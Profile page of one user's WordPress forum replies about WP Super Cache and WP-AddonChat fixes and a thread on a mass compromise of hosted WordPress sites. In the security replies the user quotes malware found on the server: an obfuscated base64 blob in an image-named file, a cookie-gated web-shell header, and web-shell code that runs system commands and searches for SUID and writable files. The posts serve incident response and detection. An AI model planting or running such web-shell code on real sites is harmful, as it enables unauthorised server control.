appleo
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: [Plugin: WP Super Cache] Caches / alwaysPS — I would suggest this become part of a base install, if ‘index.php’ is being included as an exception.
Forum: Fixing WordPress
In reply to: [Plugin: WP Super Cache] Caches / alwaysA better use of regular expressions does work:
^/$.Forum: Plugins
In reply to: [Plugin: WP Super Cache] 403’sThis was the result of upstream .htaccess rules that were blocking certain file types in wp-content/*. There were various exceptions and depending on how I was testing, I was hitting the exceptions. ugh.
Forum: Plugins
In reply to: [Plugin: WP Super Cache] New Installation not cachingI found the answer in readme.txt. The WP_CACHE setting has to be defined in wp-config.php, and must come before the line with wp-settings.php. That did it for me. I had several permissions related errors before that, but they well reported in the Admin, so it was obvious what to fix.
Forum: Plugins
In reply to: [Plugin: WP Super Cache] New Installation not cachingProblem WAS:
define( ‘WP_CACHE’, true );was below wp-settings.php.Forum: Plugins
In reply to: [Plugin: WP-AddonChat] WP-Addonchat Java ErrorThe final resolution is that what we really wanted for this site was “automatic login” and not just remote login, which is available through this plugin. We have a private area where clients are already logged in. To get the automatic functionality, required additional params to the applet code, and then customizing ras.php to handle the “automatic” authentication so that users login just once. Happy campers now π
Forum: Plugins
In reply to: [Plugin: WP-AddonChat] WP-Addonchat Java ErrorThe above issue was caused by a mismatch in the addonchat Control Panel and WP-AddonChat. That is resolved. What I have now is users that have to login twice — once for the site (the chat is in a private area of the site), and once for the chat itself. The chat login is authenticated via Wordress now. So maybe this is how it the plugin is designed to work, but what I want is an automatic login so that the user has to only supply the same information once.
Forum: Plugins
In reply to: [Plugin: WP-AddonChat] WP-Addonchat Java ErrorFollowup …
One problem solved … WP was apparently taking the generated html from
addonchat_shortcode() and adding<br />tags at each newline, which was causing the java error. After correcting that, I am getting a login prompt from addonchat, with a message that says unable to contact server. I am hoping to avoid the login prompt.I guess I am waiting to see if that is transient problem or something else.
Forum: Fixing WordPress
In reply to: Security issue, multiple sitesSo far I have found 3 of these files. All are exactly 11128 bytes. Two had identical content, but not the third. Two were in non-WP directories (one was in an Apache log directory). All had image like names (one was jpg, one was jpeg and one png). I don’t know if this is the end of this trail or not.
Forum: Fixing WordPress
In reply to: Security issue, multiple sitesThe plot thickens. Have you looked at 404_old.gif. Reading your post, I picked one site, and also found a bogus theme: comments-popup_old.png (also an image name … hmmmm). Here is a snippet from that odd looking content:
<?/*?#?#,,sess,ykpIjdjU051SXpKZzBESXU5V2F6SlhaMjlGYzNSaUNOc2pidm yY3l b RmQjNka0FDYmhKMmJzZG1DTjBuQ05zVEtvUVhhNFZXQ0s d09 OEdkZlIz xK GFrVm1ja2dDZGp b N UldaeTlGYzNsZ0NOQUNJZ0FDS dBU0NLMHdPZGR5YjA5RmRqVm1jcFJX nlkeVdVTlZSVkZ UlM5RkpnMERJdlIz DBOV1p5bEdabEpISmdrQ0l MDFKdlIz DBOV1p5bEdabEozSmJSMVVGVlZVRkox GtnQ2RsTjNjcEJDS2dZV2FKb1FEN2NDY29Cbkx1bDJadnhXTHdkM0x1NHlKZzBESXZSM1gThis file is timestamped April 11th. I’ll look for more later. There probably are many more left to unearth.
Forum: Fixing WordPress
In reply to: Security issue, multiple sitesNo real answers here either. This is just to confirm a similar situation. A server with 100+ vhosted accounts, and almost all the wordpress installations (various versions thru 2.5) were seemingly hit. All on the 11th, and every one within several minutes, according to timestamps. Which would seem to argue for a single point of entry. But the sheer volume (hundreds of files) might suggest otherwise. Almost everything was either a wordpress file, or something disguised to look like a wordpress file. The script did look for writable areas, and occasionally found non-wordpress stuff, but that was the exception. There were two signatures. Files altered as FPMSummer posted with the first line changed. And new files where all the voodoo was (422 lines), with the first line:
<?php if(md5($_COOKIE['qwerty'])=="dfa1bcf40aa72fdb46ed40f7651fe76e"){I believe all of these were ‘qwerty’ cookies. Grepping for either of those cookie names will find all the filesystem damage. A sample of that code:
if(!$safe_mode){^M if($os_type == 'nix'){^M $os .= execute('sysctl -n kern.ostype');^M $os .= execute('sysctl -n kern.osrelease');^M $os .= execute('sysctl -n kernel.ostype');^M $os .= execute('sysctl -n kernel.osrelease');^M if(empty($user)) $user = execute('id');^M $aliases = array(^M '' => '',^M 'find suid files'=>'find / -type f -perm -04000 -ls',^M 'find sgid files'=>'find / -type f -perm -02000 -ls',^M 'find all writable files in current dir'=>'find . -type f -perm -2 -ls',^M 'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',^M 'find all writable directories and files in current dir'=>'find . -perm -2 -ls',^M 'show opened ports'=>'netstat -an | grep -i listen',^M );^M }else{^M $os_name .= execute('ver');^M $user .= execute('echo %username%');^M $aliases = array(^M '' => '',^M 'show runing services' => 'net start',^M 'show process list' => 'tasklist'^M );^M }^M }^